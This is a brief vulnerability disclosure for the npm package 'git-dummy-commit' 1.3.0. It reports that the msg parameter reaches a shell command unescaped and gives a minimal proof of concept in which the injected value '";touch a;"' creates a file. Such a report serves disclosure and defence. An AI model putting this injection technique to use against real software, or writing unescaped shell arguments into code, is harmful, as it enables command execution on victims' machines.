Hi there, I’ve found a Command Injection on the “git-dummy-commit” module.
module name: git-dummy-commitversion:1.3.0npm page: https://www.npmjs.com/package/git-dummy-commit
> Create a dummy commit for testing
[62] downloads in the last day
[94] downloads in the last week
[384] downloads in the last month
[6078] downloads in the last year
The module appends the msg
parameter to a command on the line 37 without escaping it, leading to a command injection.
$ npm install git-dummy-commit
";touch a;"
on line 3.const gitDummyCommit = require('git-dummy-commit');
gitDummyCommit('";touch a;"');
$ node index.js
a
$ ls
a index.js
It is advisable to use a module that explicitly isolates the parameters to the git
command.
( contacted the maintainer || opened issue ) = False
An attacker that controls the msg
parameter can injection command on the victim’s machine.